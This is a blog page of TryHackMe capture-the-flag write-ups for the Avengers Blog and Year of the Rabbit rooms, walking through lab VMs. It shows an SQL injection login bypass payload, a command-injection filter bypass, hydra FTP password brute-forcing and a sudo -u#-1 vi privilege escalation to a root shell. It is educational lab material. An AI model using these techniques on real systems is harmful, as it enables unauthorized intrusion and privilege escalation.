Showing posts with label ftp. Show all posts
Showing posts with label ftp. Show all posts

Tuesday, January 6, 2026

TryHackMe Avengers Blog

Hi, 

This is write up for THM Avengers room on TryHackMe

Task 2 Cookies

Open the Browser and open dev tools and check storage and check the value for the cookie,

Task 3 HTTP Headers

Also for this one you will use developer tools and check the networking headers and there you ifnd the flag

Task 4 Enumeration and FTP

nmap -sv VM_IP


we can see that ftp is opened

Open cli and enter ftp vm_ip log to the ftp service with provided username and password.

  1. You then try to list the files and directories with dir or ls command 
  2. move to directory with cd dir_name
  3. list files in dir_name 
  4. use command get file_name to download the file
  5. on your attackbox open the file and you get flag3


230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x    2 1001     1001         4096 Oct 04  2019 files

226 Directory send OK.

ftp> cd files

250 Directory successfully changed.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

-rw-r--r--    1 0        0              33 Oct 04  2019 flag3.txt

226 Directory send OK.

ftp> get flag3.txt

local: flag3.txt remote: flag3.txt


Task 5 GoBuster

    For this task I ran following gobuster command to find the answer for this task:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Task 6 SQL Injection

Make sure you enter the same payload for username and password

username  :-    ' or 1=1 -- -
password  :-    ' or 1=1 -- -

Task 7 Remote Code Execution and Linux 

For this task you try using command:
cd ../; ls; cat flag5.txt
but you see that cat command is disallowed as well as head, tail and others I started to google and found rev utility which  copies the specified files to standard output, reversing the order of characters in every line

With this command we get the flag in reverse order so we need to copy it to attackbox command and reverese it again

echo "reversed_flag_string" | rev

at No comments:
Labels: , , , ,

Thursday, December 8, 2022

TryHackMe - Year of the Rabbit - writeup

Year of the Rabbit is the beginer friendly CTF room on TryHackMe.com. How ever i strongly suggest that this isnt your very first CTF room. Because this one is pretty long and not so straight forward as you would suspect from easy room. Here is my "journey" through the VM we need to hack in and
  1. step

    2. As usually I started with nmap scan:
    nmap -sS VM_IP
     Output looks promissing with open ftp, ssh and http port.
    I tried if ftp might allow us anonymous log in but without luck it doesnt allow. We will return to the ftp later.
  2. step

    3. In this step we will run our friend gobuster.
    gobuster dir -u http://VM_IP -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
     Output directs us to the /assets folder where we find 2 files.
  3. step

    4. Well we got some text and a video. The text suggest that hint is in the video so i went for that but no luck. I tried looking around the web for hint and suggestion was to use burp suite. We use it to intercept the get request for page /sup3r_s3cr3t_fl4g.php in response we find the hidden folder.
  4. step

    5. Open the hidden folder we got in previous step we find picture of the girl. Hmm what could we do with it maybe some meta data.
    strings hot_babe.png
    Voila we get list of possible password and username for FTP access.
  5. step

    6. We use hydra tool:
    hydra -l ftpuser - P possible_pass.txt ftp:/vm_ip
     Hydra will run fast because of short list and you get log in to the ftp with username and password:
    ftp VM_IP
     We are prompted for credentials. After login we use ls and we see Eli's_Creds.txt. I have downloaded filed to attackbox:
    get Eli's_Creds.txt
  6. step

    7. I have opened file on attackbox at first file looks like jibrish but I think I saw once this before.
    I have looked around the web for brainfuck language. I have confirmed that this is brainfuck and I used this decoder
    This one gave us ssh credentials.
    ssh username@VM_IP
     We enter password we got with decoded and the login we get hint were to look for flag? or soemthing else? we have found another credendetials.
    su another_username
     After logged in new account I checked home folder of user where you find the user.txt flag.
  7. step

    8. Ok we got user flag, lets try to escalate priviliges. We check if we can run any command as root user.
    sudo -l
     From output I saw you can run vi program. I headed over to the GTFObins and see what command will help us to get the root access.
    sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
     then we ctrl + c and we type in !/bin/sh and voila we have root access.
    cd /root
    ls
    cat root.txt
I hope anyone who gets stuck finds it helpful
AudiTTRSi
at No comments:
Labels: , , , , , , , , ,
Subscribe to: Comments (Atom)

TryHackMe - Shadow Trace Writeup

 Shadow Trace is premium room on TryHackMe.com part of the SOC Level 1 Path. We need to analyse a suspicious file, uncover hidden clues, an...